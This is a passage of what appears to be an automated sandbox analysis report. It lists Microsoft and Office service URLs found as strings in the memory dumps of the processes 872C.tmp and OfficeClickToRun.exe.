    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41up2pQH
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/office-growth/resources/staticcng
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/models447:38i
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/modelsopCGg(
    Source: 872C.tmp, 00000003.00000003.1394987937.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430249735.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392408338.0000000003D60000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394240204.0000000003F7C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003D60000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393216623.0000000003D60000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revere.osi.office.net/api/v
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/rs/RoamingSoapService.svct6W
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/rs/v1/settingsD4A-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1394987937.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430249735.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394240204.0000000003F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.comg
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388611638.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054916160.00000248C2BF9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2054417062.00000248C2BF8000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2058517500.00000248C2BF9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicyBearer
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://settings.outlook.com
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shredder.osi.office.net/ShredderService/web/desktop/views/main.cshtmltml
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup?ru=https://login.live.com/oauth20_authorize.srf%3fclient_id%3d0000000
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055774494.00000248C2C53000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/worke/v1
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.aiBearer
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1395251376.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://storage.azure.com/
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/catalog/laststoreupdate-AD4A-41F5A7235243
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/client/consent.aspx-16
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stores.office.com/myaccount/api/account.svc/officehubub43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stores.office.com/myaccount/api/account.svc/subscriptionon
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stores.office.com/myaccount/api/account.svc/subscriptiononey
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/CompliancePolicy/ClientSyncFile/
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Accesspdates
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficeIntelligence/v1.0/ingestionE
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficeIntelligence/v1.0/insights
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/OfficePersonalizationUserLifecycle/api/facts2hImp
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/puds/v1/me/settings/scan/outputSettings
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/recommended/api/v1.0/edgeworth
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/43-8
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory/V1t
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryFlush
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendations
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocuments
